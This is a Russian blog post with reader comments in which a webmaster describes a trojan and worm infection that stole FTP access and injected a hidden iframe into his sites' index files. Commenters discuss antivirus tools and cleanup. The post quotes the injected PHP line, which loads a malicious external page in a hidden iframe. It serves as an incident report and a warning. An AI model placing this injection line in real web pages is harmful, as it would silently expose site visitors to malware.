ГлавнаяБлогиБлог пользователя GogA

Подцепил заразу (трояна win32/Kryptik. CH и червя Win32/Pinit)

Отправил GogA (пт., 12/05/2008 - 15:55)

Проснулся пару часов назад, смотрю почти все сайты выдают ошибку.

Думаю, что за чёрт?

Лезу в код сайтов и вижу что приписана строчка для вставки скрытого слоя:

<?php echo '<div style="visibility:hiddеn"><ifrаmе src="http://gfdsgf333.com/in.cgi?27" width=100 height=80></ifrаmе></div>’; ?>

Это всё вижу под маком, загружаю ноут с виндой в безопасном режиме и сразу за чистку.

Подцепил трояна win32/Kryptik. CH и червя Win32/Pinit. D оба свеженькие, по датам видно что как сутки — двое появились в базах антивирусных.

Самое интересное, что похоже подцепил через заражённый GIF, зайдя на вредоносный сайт IE7.

Принцип действия заразы

Анализируя то что успел натворить троян/вирь, можно сказать что он искал фтп соединения, сканировал все папки на фтп и в найденные index.* вставлял ифрейм с вредоносным кодом.

Радует: Вебмани на отдельной виртуальной машине — там почти исключена вирусная активность. ЯД тоже на месте. Троян пароли нигде не поменял, теперь это мой долг.

Вспомнил SEObot’а и ещё знакомого, у которого увели 2000 вмз на днях.

Из непонятного: код появился даже на тех сайтах, пароль от которых не был сохранён в тоталкомандере (сохраняю только от аккаунтов с сателлитами). А на части сохранённых — кода нет.

Порадовал Друпал — вставка кода вызывала ошибку, так что большинство пользователей просто видели в течении 4 часов ошибку. Для тех, кто всё же пострадал — приношу извинения и рекомендую обновить антивирусные базы и проверить компьютер.

зы. Как назло, вчера вечером проверял на вирусы в 20-21 час, не помогло, уже сидели в памяти враги.

Убираем последствия

Написал нехитрый скрипт, который позволяет вычищать вставки вируса из файлов.

Подписывайтесь на rss (Что такое RSS?) чтобы оперативно получать информацию о новых записях:
Подпишись на RSS!

Как оттестирую скрипт - выложу на блоге.

Будьте осторожны!

зы. Антивирус Nod32.

Постовые

Любишь ночную клубную жизнь? Все клубы Москвы и области. Будь в курсе вечеринок и новостей из клубной жизни.
Сайт для ценителей кофе: статьи о кофе, кофеварках, кофемашинах.

Tags:
Да, с вирусами надо быть

Да, с вирусами надо быть осторожнее. Как кошмарный сон представляю себе прошлые события своей чистки сайтов(((

Отправил Автоинструктор (не зарегистрирован) (пт., 12/05/2008 - 18:57)
Тот же самый вирус сегодня

Тот же самый вирус сегодня обнаружил...

Отправил Гость (не зарегистрирован) (сб., 12/06/2008 - 18:33)
Касперский

Мне больше по душе - почему-то касперкий
Его главное хорошо настроить:)

Отправил dert88 (не зарегистрирован) (вс., 12/07/2008 - 12:27)
опять ...

епать Гога, опять по порнухе лазал ?
шутка. =) хотя в каждой шутке есть доля шутки

Отправил Сыктывкарский бомж (не зарегистрирован) (вс., 12/07/2008 - 20:11)
вообще ослом не пользуюсь

Ослом не пользуюсь, да и какая порнуха?
Наверное вёрстку тестил в этом убогом браузере и случайно в соседней вкладке что-то открыл ((

Хотя это может быть и не причина, но заражённый гиф Нод нашёл во временных файлах именно осла.

Ну ничего, это урок будет.

Ещё чуть-чуть и для финансовых операций будет или отдельный ноутбук или отдельная виртуальная машина.

Отправил GogA (пн., 12/08/2008 - 02:25)
Такую же дрянь подцепили

Такую же дрянь подцепили

Отправил Гость (не зарегистрирован) (пн., 12/08/2008 - 13:54)
у меня не только в файле

у меня не только в файле index была добавлена эта строчка, но и в файле /includes/home.php.

Отправил EASIER (не зарегистрирован) (пн., 12/08/2008 - 14:42)
Ближе к ночи выложу скрипт,

Ближе к ночи выложу скрипт, как бороться с последствиями шуршания по фтп от этого червя.

Отправил GogA (пн., 12/08/2008 - 17:10)
жду скрипта!!! Pinit на 4-х

жду скрипта!!! Pinit на 4-х машинах, даже негде взять чистый user32.dll!

Отправил welder (не зарегистрирован) (пт., 12/12/2008 - 11:05)
Скрипт для чистки фтп, пока

Скрипт для чистки фтп, пока только через почту - нужно, пишите.

Отправил GogA (ср., 12/17/2008 - 01:38)
GogA, оправь, пж, на

GogA, оправь, пж, на gazonos@gmail.com, а то нод эти вирусы определяет в мр3 и удаляет. а хочется почистить файлы и послушать.

Отправил Гость (не зарегистрирован) (вт., 02/23/2010 - 10:21)
http://gogolev.net/node/94 Оп

http://gogolev.net/node/94

Опубликована уже запись, с инструкцией как чистить пострадавшие файлы.

Отправил GogA (ср., 02/24/2010 - 09:36)
Фигня, а не троян... Помница

Фигня, а не троян...
Помница смотрел исходники полиморфного вируса на php - вот это реальное веселье :) А если хреново права настроены на серваке, то и веселье хостеру и всем пользователям хостинга.

Отправил KCEOH (не зарегистрирован) (пн., 12/08/2008 - 22:12)
Писец, скоро в туалетную

Писец, скоро в туалетную бумагу и в зубочистки вирусы встраивать начнут. Как жить? =)

Отправил Роман (не зарегистрирован) (вт., 12/09/2008 - 22:56)
Помогите плиииз

Win32/Pinit - эта гадость не удаляется.... я уже отчаялась.... после нее перестали принтеры работать!!

Отправил Александра (не зарегистрирован) (чт., 12/11/2008 - 00:19)
Страшная гатость энти

Страшная гатость энти вирусы... На локальной машине каспер и нод сравнивали... после каспера нод не нашел ничего, а вот после нода каспер одну заразу откапал. вот так вот.
ЗЫ. Без разницы какой антивирь, базы свежие всегда должны быть.

Отправил Самарский бомж (не зарегистрирован) (пн., 12/15/2008 - 08:04)
Ещё чуть-чуть и для

Ещё чуть-чуть и для финансовых операций будет или отдельный ноутбук или отдельная виртуальная машина.

По хорешему не надо ждать этиъ еще чуть чуть. Просто может так чтать, что после чуть чуть денег на отдельный ноутбук уже н ебудет. :) Просто так, заметка... :)

Отправил Vetroff (не зарегистрирован) (пн., 12/15/2008 - 23:47)
Ну давно уже народ так

Ну давно уже народ так поступает, кто-то кпк покупает для фин операций, кто-то сейчас берёт Asus eeePC.

Я в сторону последнего смотрю, может на НГ дед мороз подарит :)

Отправил GogA (ср., 12/17/2008 - 01:43)
А это все нод...

Использую лицензионный KIS (Kaspersky Internet Security), отличная защита, один раз мне на сайт подцепили троя, так при заходе KIS заблочил его вызов :)

Отправил Мостовой Ю. Р. (не зарегистрирован) (вт., 12/16/2008 - 02:02)
PinitD., PinitF. ...

А как вылечить собственно машину, помимо ликвидации последствий?

Отправил CLS (не зарегистрирован) (вт., 12/16/2008 - 08:42)
Свой ноут (не рабочий),

Свой ноут (не рабочий), отключил от инета. Инфы там нужной почти не осталось, так что скоро формат с: ентер.

Отправил GogA (ср., 12/17/2008 - 01:41)
Напишите,как виртаульной

Напишите,как виртаульной машиной пользоваться..
Статью по безопасности, так сказать.Темку подкинул :)

Отправил Волжский (не зарегистрирован) (вт., 12/16/2008 - 23:31)
Ответ

В Америке вот недавно вирус-спамера посадили на 7 лет. Конечно, он просто козел отпущения, но нам бы такой не помешал, как думаете?

Отправил Милан (не зарегистрирован) (пн., 01/12/2009 - 01:16)
В тему

Перед новым годом на такой влетел, точнее на 5 сразу разных.
По модерским делам форума проверял ссылки в постах - ну и.
С зачисткой вроде справился.

Но, возникло тут одно но недавно
С моей аськи прет спам, в логах ничего нет. Не могу понять как такое может быть и что главное делать то.

Отправил oldvovk (не зарегистрирован) (вс., 01/18/2009 - 03:45)
А что за эксплойт такой с

А что за эксплойт такой с заражённым gif?

Отправил Скачать бесплатно (не зарегистрирован) (вс., 02/01/2009 - 21:48)
Мои сайтикы частенько так

Мои сайтикы частенько так вирусовали. Но виноват был не я, тогда моего хостера взламывали и все аккаунты заражали. Но у вас наверное свой сервак.

Отправил NOMAD86 (не зарегистрирован) (сб., 02/07/2009 - 09:23)
Искоренить причину это одно,

Искоренить причину это одно, предполагается что это уже сделано. Тут может быть как троян так и взлом хостера.

Пост нацелен на искоренение результатов работы трояна (вставки в код страниц вредоносного кода).

Отправил GogA (пн., 03/23/2009 - 16:45)
Спасибо

Точно..Win32/Pinit вот эту падлу убивал

Причем на друпале сайты просто вылетели. А вот на вордпрессе на всех сайтах слетела кодировка ( судя по всему с UTF этот троян не очень дружит) на на некторых кроме ифрейма он впихнул загрузчик другого трояна - AVG так парой и ловил

Отправил Бомж беглый (не зарегистрирован) (вс., 04/19/2009 - 23:32)
У меня тоже что то подобное,

У меня тоже что то подобное, но злобного вроде ничего не сделал просто блокировал загрузку сайта пока не удалила вирус

Отправил Милая Женщина (не зарегистрирован) (пт., 05/01/2009 - 14:03)
С такой же фигней неделю

С такой же фигней неделю мучался. Решил запустить полную проверку компа. Касперский нашел около 30 троянов и один вирус, несмотря на то что я ежедневно его обновляю и настройки защиты выставил максимальные.

Потом форматнул все что только можно, перезалил вордпресс, поменял все пароли, написал хостеру, чтобы он тоже там почистил.
Второй день - вроде тихо.

Вирусоделов надо в тире выставлять и лупить по ним из боевого оружия...

Отправил dakozz (не зарегистрирован) (вт., 05/12/2009 - 13:18)
столкнулся с такои

столкнулся с такои проблемои,этот вирус заблокировал комп и мне пришлось отправлять смс,которое стоит 150 рублеи,кому интересен код разблокировки пишите сюда

Отправил Руслан (не зарегистрирован) (пт., 11/27/2009 - 23:10)
Извините, но очень глупо

Извините, но очень глупо потакать шантажистам, только способствуете их развитию.

Полезный сайт для определения стоимости sms — http://smscost.ru/

Отправил GogA (сб., 11/28/2009 - 12:12)

Отправить комментарий

Содержание этого поля является приватным и не предназначено к показу.
КАПЧА
Этот вопрос задается для того, чтобы выяснить, являетесь ли Вы человеком или представляете из себя автоматическую спам-рассылку.
  _____   _  _     _  __      _                 
 | ____| | || |   | |/ /     | |   __ _    __ _ 
 |  _|   | || |_  | ' /   _  | |  / _` |  / _` |
 | |___  |__   _| | . \  | |_| | | (_| | | (_| |
 |_____|    |_|   |_|\_\  \___/   \__, |  \__,_|
                                  |___/
Введите код, изображенный в стиле ASCII-арт.

rss - подписка

Подпишись на RSS!

Подпишись на RSS!

Друзья сайта

Последние комментарии

Регистрация доменов ru | Конкурс сладкий сеопультенок